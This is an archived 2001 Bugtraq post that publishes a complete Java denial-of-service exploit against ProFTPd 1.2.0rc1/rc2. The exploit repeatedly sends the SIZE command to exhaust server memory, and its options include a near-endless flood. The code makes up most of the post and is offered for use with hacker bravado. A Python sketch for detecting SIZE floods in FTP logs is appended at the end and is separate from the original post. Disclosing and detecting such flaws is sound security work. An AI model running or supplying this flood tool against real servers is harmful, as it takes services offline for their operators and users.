From: JeT Li (jet_li_manYAHOO.COM)
Date: Tue Jan 09 2001 - 11:50:53 CST

            Hello Bugtraq:

            Not long ago a ProFTPd remote vulnerability was released:

    "ProFTPd has a memory leakage bug when it executes the SIZE FTP command. By
    calling the FTP command SIZE 5000 times it is possible to cause ProFTPd to
    consume over 300kB of memory. Exploiting this bug with more SIZE commands
    gives us a simple DoS attack. Anonymous access is sufficient to use SIZE
    commands and to exploit this bug."

            I have coded a program that makes more than 5000 SIZE requests to the
    server, in order to crash it. Why in Java? Well, I think the procedure is
    simple enough that there is no need to code it in C. In addition, why not in Java? ;-) We
    don't need various versions of the program for Linux, BSD, Solaris, etc.; there
    is a single program for all the OSes and architectures. I wanna bet in favor of
    the use of Java to code next generation xploits & DoS ;-)

    Vulnerability: Remote DoS in ProFTPd
    Requirements: Anonymous or normal user access
    Vulnerable systems:
            ProFTPd 1.2.0rc1 (Tested)
            ProFTPd 1.2.0rc2 (Tested)
            And maybe others (1.2.0preX); I have not tested this, but I'm sure you can
    do it for me ;-)

            And now, here is the code:

    proftpDoS.java
    -----------------------
    /* Remote DoS in proFTPd
            Code by: JeT-Li -The Wushu Master- jet_li_manyahoo.com

            Well here is a little explanation about the concept of the DoS:
            ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
            calling the FTP command SIZE 5000 times it possible to cause ProFTPd
            to consume over 300kB of memory. Exploiting this bug with more SIZE
            commands gives us simple DoS attack. Anonymous access is
            sufficient to use SIZE commands and to exploit this bug.

            You don't have to give arguments when you execute the program, it will
            request you these.

            Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
            hax man in the w0rld); Perip|o (tibetan mantras for u! ;-P); and all
            the ppl of #hackers (not able for cardiac XD).

            Vulnerable systems:
            ProFTPd 1.2.0rc1 (Tested)
            ProFTPd 1.2.0rc2 (Tested)
            And maybe others (1.2.0preX); I have no test this, but I'm sure you can
            do it for me ;-)
    */

    import java.net.*;
    import java.io.*;

    class TCPconnection {

        public TCPconnection (String hostname, int portnumber) throws Exception {
        Socket s = doaSocket(hostname, portnumber);
        br = new BufferedReader (new InputStreamReader (s.getInputStream()));
        ps = new PrintStream (s.getOutputStream());
        }

        public String readLine() throws Exception {
        String s;
        try { s = br.readLine(); }
        catch (IOException ioe) {
        System.out.println("TCP Error ... it's a little hax0r exception ;-)");
        throw new Exception ("\nInput Error: I/O Error");
            }
        return s;
        }

        public void println(String s) {
            ps.println(s);
        }

        private Socket doaSocket(String hostname, int portnumber) throws Exception {
        Socket s = null;
        int attempts = 0;
        while (s == null && attempts<maxattempts) {
        try { s = new Socket(hostname, portnumber); }
        catch (UnknownHostException uhe) {
        System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
        throw new Exception("\nConnection Error: " + "unknown hostname");
        }
        catch (IOException ioe) {
        System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
        }
        attempts++;
        }
        if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
        else return s; }
        private final int maxattempts = 5;
        private BufferedReader br;
        private PrintStream ps;

        }

    class proftpDoS {

        public static void main(String[] arg) throws Exception {
        InputStreamReader isr;
        BufferedReader tcld;
        String hostnamez, username, password, file, s1, option;
        int i, j, k;
        isr = new InputStreamReader(System.in);
        tcld = new BufferedReader(isr);
        System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
        System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
        hostnamez = "";
        while (hostnamez.length()==0) {
        System.out.print("Please enter the hostname/IP: ");
        hostnamez = tcld.readLine(); }
        username = "";
        while (username.length()==0) {
        System.out.print("Enter the username: ");
        username = tcld.readLine(); }
        password = "";
        while (password.length()==0) {
        System.out.print("Enter the password for that username: ");
        password = tcld.readLine(); }
        file = "";
        while (file.length()==0) {
        System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
        file = tcld.readLine(); }
        System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
        System.out.println("1) Request 10000 size's to the server (it may be enough)");
        System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
        System.out.print("Option: ");
        option = tcld.readLine();
        k = Integer.parseInt(option);
        while (!(k==1 || k==2)) {
        System.out.print("Option not valid, please try again: ");
        option = tcld.readLine();
        k = Integer.parseInt(option); }
        TCPconnection tc = new TCPconnection(hostnamez, 21);
        tc.println("user " + username);
        tc.println("pass " + password);
        if (k==1) {
            for(i=0;i<10000;i++)
            tc.println("size " + file); }
        else if (k==2) {
        for(i=1;i<100;i++)
            for(j=2;j<((int)Math.pow(j,i ));j++)
                tc.println("size " + file); }
        tc.println("quit");
        s1 = tc.readLine();
        while (s1!=null) {
        s1 = tc.readLine();
        System.out.println("Attack completed ... as one of my friends says:");
        System.out.println("Hack just r0cks ;-)");
        }
        }
    }
    -----------------------

            Well, that's all folks ;-) Sorry for my poor English; you can send any
    questions or whatever you want to: jet_li_manyahoo.com

                                                    JeT Li -The Wushu Master-
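
Added example, not part of the original post: a detection sketch that scans an FTP command log for the pattern described above (one client repeating SIZE at a high rate) and estimates the leaked memory from the advisory's figure of over 300kB per 5000 calls. The log layout, the threshold, the window and the reading of kB as 1024 bytes are assumptions made for this example; the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed (constructed) log layout: <ISO time> <client ip> <user> "<command>" <reply code>
LINE = re.compile(r'^(\S+) (\S+) (\S+) "(\w+)(?: [^"]*)?" (\d{3})$')
# From the advisory quoted in the post: 5000 SIZE calls leak over 300 kB (lower bound).
LEAK_BYTES, LEAK_CALLS = 300 * 1024, 5000

def size_floods(lines, threshold=100, window=timedelta(seconds=10)):
    """Return {client_ip: (total SIZE calls, estimated leak in bytes)} for every
    client that sent more than `threshold` SIZE commands inside one `window`."""
    recent = defaultdict(deque)   # client -> timestamps of SIZE calls still in window
    totals = defaultdict(int)     # client -> all SIZE calls seen
    flagged = set()
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m.group(4).upper() != "SIZE":
            continue              # skip unparsable lines and other commands
        when, client = datetime.fromisoformat(m.group(1)), m.group(2)
        totals[client] += 1
        q = recent[client]
        q.append(when)
        while when - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged.add(client)
    return {c: (totals[c], totals[c] * LEAK_BYTES // LEAK_CALLS) for c in flagged}

def sample_log():
    """Constructed sample: one client looping on SIZE, one browsing normally."""
    t0 = datetime(2001, 1, 9, 11, 50, 53)
    out = []
    for i in range(5000):  # 5000 SIZE calls within 5 seconds from one address
        ts = (t0 + timedelta(milliseconds=i)).isoformat()
        out.append(f'{ts} 203.0.113.7 anonymous "size /pub/README" 213')
    for i in range(20):    # normal client: one SIZE every 30 seconds
        ts = (t0 + timedelta(seconds=30 * i)).isoformat()
        out.append(f'{ts} 198.51.100.4 anonymous "SIZE /pub/file{i}.tar.gz" 213')
    out.append("garbage line that does not parse")
    return out

if __name__ == "__main__":
    for client, (calls, leak) in size_floods(sample_log()).items():
        print(f"{client}: {calls} SIZE calls, at least ~{leak} bytes leaked (estimate)")
```

Because the advisory says anonymous access is sufficient, the check keys on client address rather than on the login name.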
